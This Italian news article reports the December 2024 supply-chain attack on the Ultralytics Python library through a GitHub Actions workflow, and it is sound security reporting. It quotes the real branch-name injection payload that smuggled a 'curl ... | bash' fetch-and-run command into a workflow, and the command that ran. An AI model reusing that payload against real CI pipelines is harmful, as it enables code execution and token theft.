Red Hot Cyber
Condividi la tua difesa. Incoraggia l'eccellenza. La vera forza della cybersecurity risiede nell'effetto moltiplicatore della conoscenza.
Condividi la tua difesa. Incoraggia l'eccellenza.
La vera forza della cybersecurity risiede
nell'effetto moltiplicatore della conoscenza.
Supply Chain Sotto Attacco! La Libreria Python Ultralytics è stata violata

Supply Chain Sotto Attacco! La Libreria Python Ultralytics è stata violata

8 Dicembre 2024 15:46

È stato attaccato il repository della libreria Python Ultralytics, ampiamente utilizzata nelle attività di visione artificiale. Approfittando di questa vulnerabilità, i criminali informatici hanno pubblicato versioni dannose della libreria su PyPI, progettate per il mining di criptovalute.

La vulnerabilità era associata al pacchetto ultralytics-actions, che automatizza l’avvio di gestori per determinate azioni nel repository. Questo è lo scopo per cui viene utilizzato il meccanismo GitHub Actions. Nel progetto Ultralytics, il gestore collegato all’evento pull_request_target ha chiamato il file format.yml per formattare il codice nelle richieste pull in entrata. Questo file eseguiva comandi shell con modelli di caratteri jolly come:

git pull origin ${{ github.head_ref || github.ref }}

git config –global utente.nome “${{ input.github_nomeutente }}”

git config –global user.email “${{ input.github_email }}”

Gli aggressori hanno inviato una richiesta pull al repository Ultralytics, specificando la seguente riga come nome del ramo:

openimbot:$({curl,-sSfL,raw.githubusercontent.com/ultralytics/ultralytics/12e4f54ca3f2e69bcdc900d1c6e16642ca8ae545/file.sh}${IFS}|${IFS}bash)

Ciò ha comportato l’esecuzione del comando:

curl -sSfL raw.githubusercontent.com/…/file.sh | bash

Di conseguenza, gli aggressori hanno avuto accesso ai token del repository e ad altri dati riservati. Si ritiene che abbiano modificato il gestore di pubblicazione per rimuovere la verifica dell’account autorizzato a pubblicare versioni su PyPI e abbiano utilizzato la tecnica di avvelenamento della cache di build di GitHub Actions per inserire i propri dati nella versione.

La prima versione dannosa di Ultralytics, versione 8.3.41, è stata pubblicata su PyPI il 4 dicembre alle 23:51 (MSK) ed eliminata alle 12:15 del giorno successivo. Alle 15:47 è stata pubblicata un’altra versione 8.3.42, che è stata rimossa alle 16:47. Pertanto le versioni dannose sono rimaste disponibili per il download per circa 13 ore. Queste versioni contenevano codice che scaricava il componente di mining XMRig da un server esterno.

Gli sviluppatori hanno risolto rapidamente il problema e hanno rilasciato le versioni correttive 8.3.43 e 8.3.44. Due giorni dopo, però, gli aggressori hanno nuovamente pubblicato le versioni dannose 8.3.45 e 8.3.46, che contenevano un codice diverso. Fino al completamento dell’indagine, si consiglia agli utenti di astenersi dall’installare nuove versioni e di impegnare la versione 8.3.44 come dipendenze.

Ti è piaciuto questo articolo? Ne stiamo discutendo nella nostra Community su LinkedIn, Facebook e Instagram. Seguici anche su Google News, per ricevere aggiornamenti quotidiani sulla sicurezza informatica o Scrivici se desideri segnalarci notizie, approfondimenti o contributi da pubblicare.

Cropped RHC 3d Transp2 1766828557 300x300
La Redazione di Red Hot Cyber fornisce aggiornamenti quotidiani su bug, data breach e minacce globali. Ogni contenuto è validato dalla nostra community di esperti come Pietro Melillo, Massimiliano Brolli, Sandro Sana, Olivia Terragni e Stefano Gazzella. Grazie alla sinergia con i nostri Partner leader nel settore (tra cui Accenture, CrowdStrike, Trend Micro e Fortinet), trasformiamo la complessità tecnica in consapevolezza collettiva, garantendo un'informazione accurata basata sull'analisi di fonti primarie e su una rigorosa peer-review tecnica.

Articoli in evidenza

Immagine del sitoInnovazione
L’IA non chiede il permesso: sta riscrivendo le regole in fretta e probabilmente male
Massimiliano Brolli - 29/01/2026

L’intelligenza artificiale è entrata nel lavoro senza bussare. Non come una rivoluzione urlata, ma come una presenza costante, quasi banale a forza di ripetersi. Ha cambiato il modo in cui le persone lavorano, sì, ma…

Immagine del sitoCybercrime
Attenzione al “I am not a robot”: la trappola malware che usa Google Calendar
Bajram Zeqiri - 29/01/2026

Una nuova minaccia si aggira, usando la nostra più grande debolezza: l’abitudine. Quante volte, infatti, capita di ritrovarsi a cliccare su caselle di verifica senza pensarci due volte? Ora, pare che i malintenzionati abbiano creato…

Immagine del sitoCybercrime
WinRAR come arma: Google scopre una falla sfruttata da APT e cybercriminali
Bajram Zeqiri - 29/01/2026

La falla di sicurezza in WinRAR, emersa durante la scorsa estate, ha mostrato una diffusione maggiore rispetto alle aspettative. Diverse organizzazioni, sia criminali comuni che gruppi APT finanziati da nazioni, stanno sfruttando attivamente questa vulnerabilità,…

Immagine del sitoCybercrime
Colpo al cuore del cybercrime: RAMP messo offline. Il “tempio” del ransomware cade!
Bajram Zeqiri - 28/01/2026

Il forum RAMP (Russian Anonymous Marketplace), uno dei principali punti di riferimento del cybercrime underground internazionale, è stato ufficialmente chiuso e sequestrato dalle forze dell’ordine statunitensi. La notizia è emersa dopo che il dominio associato…

Immagine del sitoDiritti
La privacy è morta? No, ma è in coma! Cosa celebriamo davvero oggi 28 gennaio
Silvia Felici - 28/01/2026

Oggi è il 28 gennaio e, come ogni anno da un bel po’ di tempo a questa parte, ci ritroviamo a celebrare la Giornata europea della protezione dei dati. È una roba che nasce nel…